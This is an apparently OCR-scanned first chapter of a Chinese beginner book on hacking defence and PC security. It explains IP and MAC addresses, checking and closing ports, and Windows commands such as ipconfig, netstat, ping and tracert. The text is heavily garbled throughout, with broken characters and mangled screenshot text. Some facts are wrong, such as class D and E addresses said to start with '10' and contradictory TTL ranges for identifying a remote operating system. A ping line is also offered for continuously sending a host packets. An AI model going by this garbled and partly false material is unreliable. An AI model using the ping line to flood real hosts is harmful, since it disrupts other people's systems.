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第 1 童 ” 电 脑 安 全 快速 入 门 


作为 计算 机 或 网 络 终端 设备 的 用 户 ， 要 想 使 自己 的 设备 不 受 或 少 受 黑客 的 攻击 ， 就 
必须 了 解 一 些 黑客 常用 的 入 侵 技 能 及 学 习 一 些 计算 机 安全 方面 的 知识 。 本 章 介绍 一 些 电脑 
安全 方面 的 基础 知识 ， 主 要 内 容 包 括 IP 地 址 、MAC 地 址 、 端 口 及 黑客 常用 DOS 命 令 的 应 


用 等 。 


1.1 IJP 地 址 与 MAC 地 址 


在 互联 网 中 ， 一 台 主 机 只 有 一 个 IP 地 
址 ， 因 此 ， 黑 客 要 想 攻击 某 台 主机 ， 必 须 
找到 这 台 主 机 的 耳 地 址 ， 然 后 才能 进行 入 侵 
攻击 ， 可 以 说 找到 IP 地 址 是 黑客 实施 入 侵 攻 
击 的 一 个 关键 。 


1.1.1 认识 IP 地 址 


IP 地 址 用 于 在 TCP/IP 通 信 协 议 中 标 
记 每 台 计算 机 的 地 址 ， 通 常 使 用 十 进 制 
来 表示 ， 如 192.168.1.100， 但 在 计算 机 内 
部 ，IP 地 址 是 一 个 32 位 的 二 进 制 数值 ， 
如 11000000 10101000 00000001 00000110 
(192.168.1.6) 。 
一 个 完整 的 IP 地 址 由 两 部 分 组 成 ， 分 
别 是 网 络 号 和 主机 号 。 网 络 号 表示 其 所 属 
的 网 络 段 编号 ， 主 机 号 则 表示 该 网 段 中 该 
主机 的 地 址 编号 。 
按照 网 络 规模 的 大 小 ，IP 地 址 可 以 分 
为 A、B、C、D、E 5 类 ， 其 中 A、B、C 类 
3 种 主要 的 类 型 地 址 ，D 类 专 供 多 目 传送 地 
址 ，E 类 用 于 扩展 备用 地 址 。 
e A 类 IP 地 址 。 一 个 A 类 IP 地 址 由 1 个 
字 节 的 网 络 地 址 和 3 个 字 节 的 主机 
地 址 组 成 ， 网 络 地 址 的 最 高 位 必 
须 是 “0”， 地 址 范围 从 1.0.0.0 一 


126.0.0.0。 
e B 类 IP 地 址 。 一 个 B 类 IP 地 址 由 2 个 
字 节 的 网 络 地 址 和 2 个 字 节 的 主机 


地 址 组 成 ， 网 络 地 址 的 最 高 位 必须 


是 “10”， 地 址 范围 从 128.0.0.0 一 
191.255.255.255。 

e C 类 IP 地 址 。 一 个 C 类 IP 地 址 由 3 个 
字 节 的 网 络 地 址 和 1 个 字 节 的 主机 
地 址 组 成 ， 网 络 地 址 的 最 高 位 必须 
是 “110”。 地 址 范围 从 192.0.0.0 一 
223.255.255.255 。 

e D 类 IP 地 址 。D 类 IP 地 址 第 一 个 字 节 
以 “10” 开 始 ， 它 是 一 个 专门 保留 
的 地 址 。 它 并 不 指向 特定 的 网 络 ， 
目前 这 一 类 地 址 被 用 在 多 点 广播 
(Multicast) 中 。 多 点 广播 地 址 用 
来 一 次 寻 址 一 组 计算 机 ， 它 标识 共 
享 同 一 协议 的 一 组 计算 机 。 

e@ E 类 IP 地 址 。 以 “10” 开 始 ， 为 将 来 
使 用 保留 ， 全 “0” (0.0.0.0) IP 地 
址 对 应 于 当前 主机 ; 全 “1” 的 IP 地 
址 (255.255.255.255) 是 当前 子 网 
的 广播 地 址 。 

具体 来 讲 ， 一 个 完整 的 IP 地 址 信息 应 

该 包括 卫 地 址 、 子 网 掩 码 、 默 认 网 关 和 DNS 
等 4 部 分 。 只 有 这 些 部 分 协同 工作 ， 在 互联 
网 中 计算 机 才能 相互 访问 。 

e 子 网 掩 码 : 子 网 掩 码 是 与 IP 地 址 结 
合 使 用 的 一 种 技术 。 其 主要 作用 有 
两 个 : 一 是 用 于 确定 IP 地 址 中 的 网 
络 号 和 主机 号 ; 二 是 用 于 将 一 个 大 
的 耳 网络 划分 为 若干 小 的 子 网 络 。 

e 默认 网 关 : 默认 网 关 意 为 一 台 主 机 
如 果 找 不 到 可 用 的 网 关 ， 就 把 数据 
包 发 送 给 默认 指定 的 网 关 ， 由 这 个 


网 关 来 处 理 数 据 包 。 
e DNS: DNS 服务 用 于 将 用 户 的 域名 
请 求 转换 为 IP 地 址 。 


1.1.2 ”认识 MAC 地 址 


MAC 地 址 是 在 媒体 接 入 层 上 使 用 的 地 
址 ， 也 称 为 物理 地 址 、 硬 件 地 址 或 链 路 地 
址 ， 由 网 络 设备 制造 商 生 产 时 写 在 硬件 内 
部 。MAC 地 址 与 网 络 无 关 ， 也 即 无 论 将 带 
有 这 个 地 址 的 硬件 〈 如 网 卡 、 集 线 器 、 路 
由 器 等 ) 接 入 到 网 络 的 何 处 ，MAC 地 址 都 
是 相同 的 ， 它 由 厂商 写 在 网 卡 的 BIOS 里 。 

MAC 地 址 通常 表示 为 12 个 十 六 进 制 
数 ， 每 两 个 十 六 进 制 数 之 间 用 冒号 隔 开 ， 
如 08:00:20:0A:8C:6D 就 是 一 个 MAC 地 址 ， 
其 中 前 6 位 (08:00:20) 代表 网 络 硬 件 制 
造 商 的 编号 ， 它 由 IEEE 分 配 ， 而 后 3 位 
(0A:8C:6D) 代表 该 制造 商 所 制造 的 某 个 
网 络 产品 〈 如 网 卡 ) 的 系列 号 。 每 个 网 络 
制造 商 必须 确保 它 所 制造 的 每 个 以 太 网 设 
备 前 3 个 字 节 都 相同 ， 后 3 个 字 节 不 同 ， 这 
样 ， 就 可 以 保证 世界 上 每 个 以 太 网 设备 都 
具有 唯一 的 MAC 地 址 。 


(Catt 


IP 地 址 与 MAC 地 址 的 区 别 在 于 : IP 
地 址 基于 逻辑 ， 比 较 灵 活 ， 不 受 硬 件 限 
制 ， 也 容易 记忆 。MAC 地 址 在 一 定 程度 
上 与 硬件 一 致 ， 基 于 物理 ， 能 够 具体 标 
识 。 这 两 种 地 址 均 有 各 自 的 长 处 ， 使 用 
时 也 因 条 件 不 同 而 采取 不 同 的 地 址 。 


1.1.3 ”查看 IP 地 址 


计算 机 的 IP 地 址 一 旦 被 分 配 ， 可 以 说 
是 固定 不 变 的 ， 因 此 ， 查 询 出 计算 机 的 下 地 
, 址 ， 在 一 定 程度 上 就 实现 了 黑客 入 侵 的 前 
寻 玫 提 工 作 。 使 用 ipconfig 命 令 可 以 获取 本 地 计 
党 算 机 的 了 地址 和 物理 地 址 ， 具 体 的 操作 步 又 
如 下 。 


SS 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


step 国 右 击 “ 开 始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 执行 “运行 ”命令 。 


[Sep 图 打开 “运行 ”对 话 框 ， 在 “打开 ”后 
面 的 文本 框 中 输入 cmd 命 令 。 


本 运行 x 


| Windows 梅 根据 你 所 给 入 的 名 称 ,为 你 打开 相应 的 程序 ， 
文件 夹 、 文档 或 Internet 资源 ， 


打开 (O): [cmd 


了 请 SB).. 
[step 图 单 击 “确定 ”按钮 打开“ 命令 提示 
符 ” 窗 口 ， 在 “命令 提示 符 ” 窗 口中 输入 
ipconfig， 按 Enter 键 ， 即 可 显示 出 本 机 的 IP 


，，。:; 媒体 已 新 开 连 接 
:DHCP HOST 

: 想 休 已 新 开 乏 接 

柑 件 已 新 开 迫 接 


: DHCP HOST 


毁 休 已 断 开 过 接 


侈 提示 :在 “命令 提示 符 ” 窗 口中 ，192. 
168.0.130 表 示 本 机 在 局 域 网 中 的 耳 地址 。 


1.1.4 查看 MAC 地 址 


在 “命令 提示 符 ” 窗 口中 输入 ipconfig / 
all 命 令 ， 然 后 按 Enter 键 ， 可 以 在 显示 的 结 


果 中 看 到 一 个 物理 地 址 : 00-23-24-DA-43- 
8B， 这 就 是 用 户 计算 机 的 网 卡 地 址 ， 它 是 
唯一 的 。 


画 CNWINDOWS\yster32emd exe - oO x 


:NUsersVqiangu)ipconfig /all 


jindows IP 配置 


这 . » : DESKIOP-RJENIOC 
i 
其 从 DHCP HOST 
以 六 网 二 器 以 本 网 
PR 多 已 
DNS 后 织 ，.. nr 寺 tT 
和 » : Realtek FCIe CBE Fanily Controller 
人 ，。。: 00-23-24-DA-43-8B 
名 : 
Bj 。 
元 线 局 二 了 过 卫 癌 本 地 过 法 " 3: 


1.2 ”什么 是 端口 


“端口 ”可 以 认为 是 计算 机 与 外 界 通 
信和 交流 的 出 口 。 一 个 IP 地 址 的 端口 可 以 有 
65 536( 即 256X256) 个 ， 端 口 是 通 过 端 
口号 来 标记 的 ， 端 口号 只 有 整数 ， 范 围 是 
0 一 65 535 (256X256-1) 。 

1.2.1 认识 端口 

计算 机 领域 可 分 为 硬件 领域 和 软件 
领域 。 在 硬件 领域 中 ， 端 口 又 被 称 为 接 
口 ， 如 常见 的 USB 端 口 、 网 卡 接口 、 串 行 
端口 等 ， 在 软件 领域 中 ， 端 口 一 般 是 指 
网 络 中 面向 连接 服务 和 无 连接 服务 的 通信 
协议 端口 ， 是 一 种 抽象 的 软件 结构 ， 包 
括 一 些 数 据 结 构 和 I/O (基本 输入 输出 ) 组 
冲 区 。 

在 网 络 技术 中 ， 端 口 又 有 几 种 含义 : 
其 中 ， 一 种 是 物理 意义 上 的 端口 ， 如 集 线 
器 、 交 换 机 、 路 由 器 等 连接 设备 ， 用 于 连 
接 其 他 的 网 络 设备 的 接口 ， 常 见 的 有 RJ-45 
端口 、Serial 端 口 等 ， 另 一 种 是 逻辑 意义 上 
的 端口 ， 一 般 指 协议 TCP/IP 中 的 端口 ， 范 
围 是 0 一 65 535 (256X256-1)。 
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1.2.2 ”查看 系统 的 开放 端口 


可 以 帮助 计算 机 用 户 及 时 提高 系统 安全 ， 
防止 黑客 通过 端口 入 侵 计 算 机 。 用 户 可 
以 使 用 netstat 命 令 查 看 自己 系统 的 端口 
状态 ， 具 体操 作 步 又 如 下 。 

[sep 国 打开 “命令 提示 符 ” 窗 口 ， 在 其 中 输 


入 netstat -a -n 命 令 。 


画 CWINDOWS\system32\c. 一 口 X 


:NMUsers\qiangu>netstat -a -ne 


step 图 按 Enter 键 ， 即 可 看 到 以 数字 显示 的 
TCP 和 UCP 连 接 的 端口 号 及 其 状态 。 


画 c\wNDpowswysem3zkmdeme - oO x 
PNUsersvaianguynetstat -a ~—n 


活动 连接 


LISTENING 
LISTENING 
LISTENING 
LISTENTNG 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
0. LISTENING 
2 ESTABLISHED 


seepseeeepessseS 


经 常 查 看 系统 开放 端口 的 状态 变化 ， 葬 


黑客 攻防 与 电脑 安全 从 新 手 到 高 手 〈 微 视频 + 火力 升级 版 ) 


四 1.2.3 关闭 不 必要 的 端口 
默认 情况 下 ， 计 算 机 系统 中 有 很 多 没 
有 用 或 不 安全 的 端口 是 开启 的 ， 这 些 端 口 
很 容易 被 黑客 利用 。 为 保障 系统 的 安全 ， 
可 以 将 这 些 不 用 的 端口 关闭 。 关 闭 端 口 的 
方式 有 多 种 ， 这 里 介绍 通过 关闭 无 用 服务 
来 关闭 不 必要 的 端口 。 

以 关闭 Branch Cache 服 务 为 例 ， 具 体操 
作 步 又 如 下 。 
[step 图 右 击 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 执行 “控制 面板 ”命令 。 


任 各 管理 黑 (D 


控制 右 权 P) 


[step 图 打开 “控制 面板 ”窗口 ， 双 击 “ 管 理 
工具 ”图 标 。 


个 国 ， 近 NE ， 所 有 过 和 机 
re 日 SEV IRM 


调整 计算 机 89 设 兰 ER XG ~ 


| mwindow 7 闻 本 Fo 


| 吕 ue ee 
| 钾 aa BD ss 
EE IFxf 夫 依 EaTR 
萌 as p23 
区 一 急 生 


step 图 打开 “管理 工具 ”窗口 ， 双 击 “ 服 
务 ” 图 标 。 


step 国 打开 “服务 ”窗口 ， 找 到 Branch 
Cache 服 务 项 。 


[step 较 双击 该 服务 项 ， 弹 出 “Branch Cache 
的 属性 ”对 话 框 ， 在 “启动 类 型 ”下 拉 
列表 中 选择 “禁用 ”选项 ， 然 后 单 击 “ 确 
定 ” 按 钮 禁用 该 服务 项 的 端口 。 

BranchCache 的 寿 性 (林地 计算 机 其 


轨 规 。 要 录 。 恢复 。 依 他 关系 


服务 名 称 ' PeerDis'Svc 
ss 称 BranchCache 
把 述 : 此 服务 并 存 来 后 本 地 子 网 上 对 等 方 的 网 旋 内 容 , 
可 纹 行 文人 的 路 人 
CNWINDOWeNeyztemazvzehoztexe keerDiat 
启动 类 型 (E) 手动 
县 动 延 刀 启 动 ) 
自动 
# 
服务 状态: yf Is 
启动 (S) 个 上 上 暂停 fp 全 复 (R) 


当 从 此 处 宫 动 服务 对， 你 可 指定 所 适用 的 启动 参数 


CJ | Bm 
1.2.4 ”启动 需要 开启 的 端口 
开启 端口 的 操作 与 关闭 端口 的 操作 类 


似 ， 下 面具 体 介 绍 通过 启动 服务 的 方式 开 
启 端口 的 具体 操作 步骤 。 这 里 以 右边 上 述 
停止 的 Branch Cache 服 务 端口 为 例 。 

[sep 国 在 “Branch Cache 的 属性 ”对 话 框 中 
单 击 “ 启 动 类 型 ” 右 侧 的 下 拉 按 钮 ， 在 弹 
出 的 下 拉 列 表 中 选择 “自动 ”。 
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BranchCache 若 富 生计 闻 计 算 矶 ) x 
号。 全 妇 。 从 揽 。 信友 关系 
ee 
a 
下 于 二 了 上 上访 等 方 和 局 阁 志 吉 
可 可 行文 件 的 由 径 : 
a 
RE ba 
ee 
括 动 
Es 
we MW 
| 本 -本 LE 


step 图 单 击 “应 用 ”按钮 激活 “服务 状 
态 ” 下 的 “启动 ”按钮 。 单 击 “ 启 动 ” 按 
钮 ， 即 可 启动 该 项 服务 。 


BranchCache 的 性 [车 地 计算 x 


尾 现 。 登录 。 估 复 。 依 至 关于 


服务 包 条 PeerDistsvd 
Bs Brarchcache 
Wi a 


= 
[step 图 再 次 单 击 “ 应 用 ”按钮 ， 在 “Branch 
Cache 的 属性 ”对 话 框 中 可 以 看 到 该 服务 的 
“服务 状态 ”已 经 变 为 “正在 运行 ”。 


Branchcache 富生 地 计 和 抽 ) x 


局 岗 。 登录。 傣 复 。 体育 关系 


县 Sa PeerDistsud 
Ss BranchCache 
i | 攻 当 生 相 三 本 地 了 所 上 等 记 站 朵 让 窜 - 
六 的 本 径 
CAWINDOWS\Syetem32\evehoct exe -kpeerDiet 
swag | 本 
IEE 
ER LD) Es ES 


[steep 贺 单 去“ 确定 ”按钮 ， 返 回 “服务 ” 窗 
口 ， 此 时 即 可 发 现 Branch Cache 服 务 的 “ 状 
态 ” 变 为 “正在 运行 ”， 这 样 就 可 以 成 功 
开启 Branch Cache 服 务 对 应 的 端口 。 


1.3 黑客 常用 的 DOS 命 令 


熟练 掌握 一 些 DOS 命 令 是 一 名 计算 机 
用 户 的 基本 功 ， 本 节 就 来 介绍 黑客 常用 的 
一 些 DOS 命 令 。 了 解 这 样 的 命令 可 以 帮助 
计算 机 用 户 追 踪 黑 客 的 踪迹 ， 从 而 提高 个 
人 计算 机 的 安全 性 。 


1.3.1 cd 命令 


cd (Change Directory) 命令 的 作用 是 改 卫生 


变 当前 目录 ， 该 命令 用 于 切换 路 径 目录 。 

cd 命令 主要 有 以 下 3 种 使 用 方法 。 

(1) cd path: path 是 路 径 ， 例 如 输入 cd 
cx\ 命 令 后 按 Enter 键 或 输入 cd Windows 命 令 ， 
即 可 分 别 切换 到 CA\ 和 CANWindows 目 录 下 。 

(2) cd..: cd 后 面 的 两 个 “.” 表 示 返 
回 上 一 级 目录 ， 例 如 当前 的 目录 为 C:\Win- 
dows， 如 果 输 入 cd.. 命 令 ， 按 Enter 键 即 可 返 
回 上 一 级 目录 ， 即 Ci\。 

(3) cd\: 表示 当前 无 论 在 哪个 子 目录 
下 ， 通 过 该 命令 可 立即 返回 到 根 目录 下 。 

下 面 将 介绍 使 用 cd 命令 进入 C:\Win- 
dows\system32 子 目录 ， 并 退回 根 目录 的 具 
体操 作 步 又 。 

[step 回 在 “命令 提示 符 ” 窗 口中 输入 cd ci\ 命 


令 ， 按 Enter 键 ， 即 可 将 目录 切换 为 C:\。 


丽 管理 a: C\WWINDOWS\system32\emd.exe 一 口 莹 


Microsoft Windows [版 本 10.0. 17134. 319] 
(c) 2018 J6icrosoft Corporation。 保 留 所 有 权利 。 


:NUsersNAdministrator>cd c:\ 


cD 


[step 图 如 果 想 进入 C:\Windows\system32 目 
录 中 ， 则 需 在 上 面 的 “命令 提示 符 ” 窗 
口中 输入 cd Windows\system32 命 令 ， 按 
Enter 键 ， 即 可 将 目录 切换 为 C:\Windows\ 
system32。 


而 管理 员 ; CWINDOWS\system32\cmd.exe - 0 x 


Jicrosoft Windows [版 本 10.0. 17134.319] 
(c) 2018 Microsoft Corporation。 保 留 所 有 权利 。 


C:\Users\Administrator>cd c:\ 
cl:\>cd Windows\system32 


Ic: \Windows\System32), 


[sep 图 如 果 想 返回 上 一 级 目录 ， 则 可 以 在 
“命令 提示 符 ” 窗 口中 输入 cd.. 命 令 ， 按 
Enter 键 。 


而 特 理 员 : CWINDOWS\system32\cmd.exe - 0 x 


MMicrosoft Windows [版 本 10.0. 17134. 319] 
(c) 2018 Microsoft Corporation。 保留 所 有 权利 。 


:NUsersVAdministrator>cd c:\ 
|e:\>cd Windows\system32 
[c:\Vindows\System32>cd. . 
:Vindows> 


step 贺 如 果 想 返回 到 根 目 录 ， 则 可 以 在 “ 命 
令 提 示 符 ”窗口 中 输入 cd 命令 ， 按 Enter 键 。 


画 匠 到 和 ;CAWINDOWS\syste" ns = 口 x 


Microsoft Windows [版 本 10.0.17134.319] 
(c) 2018 Microsoft Corporation。 保 留 所 有 权利 。 


[CE:NUsersNAdministrator>ycd c:\ 


c:WVed Windows\system32 
[c:\Windows\System32>cd. . 
c:\Windows>cd\ 


:> 


号 1.3.2 dir 命令 


dir 命 令 的 作用 是 列 出 磁盘 上 所 有 的 或 
指定 的 文件 目录 ， 可 以 显示 的 内 容 包含 卷 


SS 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


标 、 文 件 名 、 文 件 大 小 、 文 件 建立 日 期 和 
时 间 、 目 录 名 、 磁 盘 剩 余 空间 等 。 
dir 命 令 的 格式 如 下 。 


dir [ 查 符 ] [路 径 ] [文件 名 ] [/P] [/W] [/A: 属 性 ] 


其 中 各 个 参数 的 作用 如 下 。 

(1) /P: 当 显示 的 信息 超过 一 屏 时 暂停 
显示 ， 直 至 按 任意 键 才 继续 显示 。 

(2) /W: 以 横向 排列 的 形式 显示 文件 
名 和 目录 名 ， 每 行 5 个 (不 显示 文件 大 小 、 
建立 日 期 和 时 间 )。 

(3) /A: 属 性 : 仅 显 示 指 定 属性 的 文 
件 ， 无 此 参数 时 ，dir 显 示 除 系统 和 隐 含 
文件 外 的 所 有 文件 。 可 指定 为 以 下 几 种 
形式 。 

@ /A:S: 显示 系统 文件 的 信息 。 

@ /A:H: 显示 隐 含 文件 的 信息 。 

@@/A:R: 显示 只 读 文件 的 信息 。 

@ /A:A: 显示 归档 文件 的 信息 。 

/A:D: 显示 目录 信息 。 

使 用 dir 命 令 查 看 磁盘 中 的 资源 ， 有 具体 
操作 步骤 如 下 。 

[sep 园 在 “命令 提示 符 ” 窗 口中 输入 dir 命 


令 ， 按 Enter 键 ， 即 可 查看 当前 目录 下 的 文 
件 列表 。 


而 管理 呈 : C\WINDOWS\system32\cmd .exe - 0O x 


及 crosoft Windows [版 本 10. 0. 17134, 319] ~ 
(c) 2018 Microsoft Corporation。 保留 所 有 权利 。 
:\Users\AdninistratorYdir 
的 卷 是 Windows 
i 2ECC-1807 


C:\Users\Adninistrator 的 目录 


2018/11/26 12:43 <DIR> 
2018/11/26 12:43 <DIR> 


2018/11/26 12:43 <DIR> 3D Objects 


2018/11/26 12:43 <DIR> Contacts 
2018/11/26 12:47 <DIR> Desktop 
2018/11/26 12:43 DIR> Documents 
2018/11/26 12:43 ODIR> Downloads 
2018/11/26 12:43 DIR> Favorites 


2018/11/26 12:43 <DIR> 

2018/11/26 12:43 <DIR> Jusic 
2018/09/19 12:45 <DIR> OneDrive 
2018/11/26 12:43 <DIR> 
2016/11/28 11:11 <DIR> 
2018/11/26 12:43 DIR> 
2018/11/26 12:43 qr 
2018/11/26 12: 和 Vdaoe, 


16 et 28, 804, 747, 264 4 于 


LC:\Users\Administrator> 
step 图 在 “命令 提示 符 ” 窗 口中 输入 dir d:/ 


aid 命 令 ， 按 Enter 键 ， 即 可 查看 D 盘 下 的 所 
有 文件 的 目录 。 


恒生 2 六 cNWNDowslsystemazamd exe - oO x 
Mp er ad 和 


的 疝 二 | 号 是 BOCE-3B52 
D:Y 的 目录 


0D17702713 
017707/31 
018707705 
018711720 
2017/07/21 
约克 


360Downloads 
Es 安全 浏览 器 下 载 


Md Co zol5 通用 破 


D017/07/31 
017/07/25 
解 补丁 v1, 5 
015/06/24 
17/11/1¢ 
0D17702711 
UL_Chinese， 
017/02/19 


017/03/01 
017/03/03 
017/08/ 02 
018/00/21 
018/11/20 
017/08/03 
017/03/23 
017/1110 


在 “命令 提示 符 ” 窗 口中 输入 dir 
ci\windows /a:h 命 令 ， 按 Enter 键 ， 即 可 列 出 
Ci\Windows 目 录 下 的 隐藏 文件 。 


AdcbeCC20142015pj 
AdcbeDreammyeayerCS5 
AutoCAD_2016_Sirplifi 


CantasiaStudio-vE. 03H 


DESKTOP-RJKNEOC 
HyperSnap 6 
Java 


6_ch 32Bit 
16 正 式 


| NDOWS\system32\cmdexe 二 “如 
i ci\Wwindows /aih “ 

de 

1 

ci\vindows 人 
018/04/13 23:57 DIF> BitLockerDiccevoryYo 
weContents 
018/04/12 07:38 <DIR> ELANBKUP 
2018/11/25 11:03 <DIRS Tnstaller 
Pw 07:38 <DIR> Language0verlayCache 
is 0 070 ppl lanitos 


a 798, 865， 0 可 用 字 节 
:NIsarsNAcmi ni stratory- 


1.3.3 ping 命令 


ping 命 令 是 协议 TCP/IP 中 最 为 常用 的 
命令 之 一 ， 主 要 用 来 检查 网 络 是 否 通畅 或 
者 网 络 连接 的 速度 。 对 于 一 名 计算 机 用 户 
来 说 ，ping 命 令 是 第 一 个 必须 掌握 的 DOS 命 
令 。 在 “命令 提示 符 ” 窗 口中 输入 ping /?， 


二 由 | 得 玉 13 a 
可 以 得 到 这 条 命令 的 帮助 信息 。 

丽 ; 管理 只: C\WINDOWS\system32\cmd.exe 口 x 
C:\Users\Adninistrator>ping /9 ~ 
用 法 : ping [-t] [-a] [-n count] [-1 size] [-f] [-i TIL] [-v TDS] 

]] [-r court] [-s count] [[-j host-list] | [-k host-list 

[-w timeout] [-R] [-8 sreaddr] [-e compartnent] [-p] 
[-4] [-6] target_name 
| Fing 指证 的 主机 ， 
Si, ceive 
停止， 请 刍 和 Ctrltc。 
Se 
Sy EL 和 中 仿 知 “不 分 段 " 标记 ( 仅 适用 于 Tpvg。 
Tos 类 型 ( 仅 适用 于 Ipy4， 该 设置 已 
E 有 和 生生 
i 有 计 数 中 与 于 Ivy 
2 入 光 和 的 路 由 通用 a 
sis 上 人 委 志向 从 要 于 as 用 于 pr) 
khost-list 与 主机 列表 一 起 使 用 的 严格 源 路 由 ( 仅 适用 于 Tpvg 、 
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使 用 ping 命 令 对 计算 机 的 连接 状态 进行 
测试 的 具体 操作 步骤 如 下 。 
step 国 使 用 ping 命 令 来 判断 计算 机 的 操作 系 


统 类 型 。 在 口中 输入 ping 
192.168.0.130 命 令 行 结果 如 下 图 所 示 。 
丽 入 二 a: CMWINDOWS\system32\emd.exe 二 口 x 


P:AUsersNAdministratoryping 192. 168. 0. 130 
| Ping 192. 168.0 0 具有 和 的 束 失 : 


192.168.0. 130 的 32 时 间 <lms TIL=128 
192. 168. 0. 130 2 时 恒 clms TIL=128 
和 目 182. 168. 0. 130 2 时 
目 192. 168. 0. 130 2 四 


Bl lms TIL=128 


ee 
= 
多 Clms TIL=128 


=3: 


168. 0, 130 的 Ping 统计 
埃 迫 色 : 已 发送 一 4 


中 和 的 全 :gd ( 以 豆 种 为 靖 信 
| 


4 丢失 = 0 (0% 丢失 ) 


= Ons 


P:\Users\Adninistrator> 


在 “命令 提示 符 ” 窗 口中 输入 ping 
192.168.0.130 -t -1 128 命 令 ， 可 以 不 断 向 某 
台 主 机 发 出 大 量 的 数据 包 。 


而 RCAWINDOWS\Wycem3Aemdexe ping. — 口 Xx 


FP:\Users\Administrator>ping 192. 168.0.130 -t -1 128 


128 字 节 的 数据 ， 
=128 时 间 《lms TTL-128 


: 
3 
3: 
他 
他 


DDDDDDDDDDDD 


E: 


判断 本 台 计 算 机 是 否 与 外 界 网 络 连 六 2 
在 “命令 提示 符 ” 窗 口中 输入 ping 
www.baidu.com 命 令 ， 其 运行 结果 如 下 图 


所 示 ， 图 中 说 明 本 台 计 算 机 与 外 界 网 络 
而 等到 只: CWINDOWS\system32Ycmd exe 六 口 X| 


(9) 2018 中 crosoft Corporation。 保留 所 有 权利 。 
Lb:\Users\Adninistrator>ping wwy.baidu con 


正在 Ping www. wshiten. com [103, 235. 46. 39] 具有 32 字 节 的 数据 ; 


PD:\sers\Adninistrator>. 


[step 贺 解析 某 IP 地 址 的 计算 机 名 。 在 “命令 
提示 符 ” 窗 口中 输入 ping -a 192.168.0.130 命 
令 ， 其 运行 结果 如 下 图 所 示 ， 可 知 这 人 台 主 
机 的 名 称 为 DESKTOP-RJKNMOC。 


(Cnt 


利用 TTL 值 判断 操作 系统 类 型 。 由 于 

不 同 操作 系统 的 主机 设置 的 TTL 值 是 不 同 
辐 的 ， 所 以 可 以 根据 其 中 TTL 值 来 识别 操作 
系统 类 型 。 一 般 情况 下 ， 分 以 下 3 种 。 

(1) TTL=32， 则 认为 目标 主机 操作 
系统 为 Windows 95/98。 

(2) TITL=64 一 128， 就 认为 目标 主机 
操作 系统 为 Windows NT/2000/XP/7/10。 

(3) TTL=128 一 255 或 者 32 一 64 就 认 
为 是 UNIX/Linux 操 作 系 统 。 


1.3.4 ”net 命令 


l 使 用 net 命 令 可 以 查询 网 络 状态 、 共 享 
资源 及 计算 机 所 开启 的 服务 等 ， 该 命令 的 
语法 格式 信息 如 下 。 
NET [ ACCOUNTS | COMPUTER | CONFIG | 
CONTINUE | FILE | GROUP | HELP | HELPMSG 
| LOCALGROUP | NAME | PAUSE | PRINT | 


SEND | SESSION | SHARE | START | STATIS- 
TICS | STOP | TIME | USE | USER | VIEW ] 


查询 本 台 计 算 机 开启 哪些 Windows 服 务 
的 具体 操作 步骤 如 下 。 
[seep 园 使 用 net 命 令 查看 网 络 状 态 。 打 开 
“命令 提示 符 ” 窗 口 ， 输 入 net start 命 令 。 
a 管理 员 : CMWINDOWS\system32\em... 地 口 第 


icrosoft Windows [版 本 10.0. 17134.319] ~ 
所 有 权利 。 


人 2018 Jicrosoft Corporation。 保 留 


:\Users\Administrator net starte 


step 图 按 Enter 键 ， 则 在 打开 的 “命令 提 
示 符 ”窗口 中 可 以 显示 计算 机 所 启动 的 
Windows 服 务 。 
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netstat 命 令 主 要 用 来 显示 网 络 连 接 的 信 
息 ， 包 括 显示 活动 的 TCP 连 接 、 路 由 器 和 网 
络 接 口 信息 ， 是 一 个 监控 TCP/IP 网 络 非常 
有 用 的 工具 ， 可 以 让 用 户 得 知 系统 中 当前 
都 有 哪些 网 络 连 接 正常 。 

在 “命令 提示 符 ” 窗 口中 输入 net- 
stat/?， 可 以 得 到 这 条 命令 的 帮助 信息 。 


[CE owes o x 


netstat 命 令 


ER 


该 命令 的 语法 格式 信息 如 下 。 


NETSTAT [-a] [=b] [=~e] [=f] [-a] [-o] 
Lp protol -xr [=s] [=x] I=t) (intervall 


其 中 比较 重要 的 参数 的 含义 如 下 。 

e -a: 显示 所 有 连接 和 监听 端口 。 

e -n: 以 数字 形式 显示 地 址 和 端口 号 。 

使 用 netstat 命 令 查看 网 络 连接 的 具体 操 
作 步 又 如 下 。 


step 国 打开 “命令 提示 符 ” 窗 口 ， 在 其 中 输 
入 netstat -n 或 netstat 命 令 ， 按 Enter 键 ， 即 可 
查看 服务 器 活动 的 TCP/IP 连 接 。 


| en 

活动 连接 

协议 本 地 地 址 外 部 地址 
127,0.0, Es 


gasvaministratcey 


大志 


[I] 在 “命令 提示 符 ” 窗 


口中 输入 netstat - 工 


命令 ， 按 Enter 键 ， 即 可 查看 本 机 的 路 由 信息 。 


[step 图 在 “命令 提示 符 ” 窗 口中 输入 netstat 


-a 命令 ， 按 Enter 键 ， 即 可 查看 本 机 所 有 活 


动 的 TCP 连 接 。 


Fr dinlatrator notett 


外 部 地 址 
SETOP- 
Ee: 


LISTENENS 


[step 园 在 “命令 提示 符 ” 窗 口中 输入 netstat 


-n -a 命令 ， 按 Enter 键 ， 即 可 显示 本 机 所 有 
连接 的 端口 及 其 状态 。 
Ea Vministrator matetat -n -a | 


好 机 
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1.3.6 tracel 


使 用 tracert 命 令 可 以 查看 网 络 中 路 由 节 关 
点 信息 ， 最 常见 的 使 用 方法 是 在 tracert 命 令 “ 
后 追加 一 个 参数 ， 表 示 检 测 和 查看 连接 当前 
主机 经 过 了 哪些 路 由 节点 ， 适 合用 于 大 型 网 
络 的 测试 。 该 命令 的 语法 格式 信息 如 下 。 


tracert [-d] [-h MaximumHops] [-j 
Hostlist] [-w Timeout] [TargetName] 


其 中 各 个 参数 的 含义 如 下 。 

e -d: 防止 解析 目标 主机 的 名 称 ， 可 
以 加 速 显 示 tracert 命 令 结 果 。 

e -h MaximumHops: 指定 搜索 到 目标 
地 址 的 最 大 跳跃 数 ， 默 认为 30 个 跳 


跃 点 。 

e -j Hostlist: 按照 主机 列表 中 的 地 址 
释放 源 路 由 。 

e -w Timeout: 指定 超时 时 间 间 隔 ， 默 
认 单 位 为 毫秒 。 


e TargetName: 指定 目标 计算 机 。 

例如 : 如 果 想 查看 www.baidu.com 的 路 
